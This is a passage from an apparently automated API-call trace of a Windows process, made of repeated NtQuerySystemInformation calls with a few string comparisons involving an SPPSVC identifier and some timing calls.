(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.056] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcce8, Length=0x50, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0273.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0273.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0273.065] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0273.065] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0273.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x28, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0273.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf40 | out: lpSystemTimeAsFileTime=0xf7a68fcf40*(dwLowDateTime=0x35248e3b, dwHighDateTime=0x1d63874)) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0273.100] GetTickCount () returned 0x11846cb [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0273.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0273.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0273.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.115] 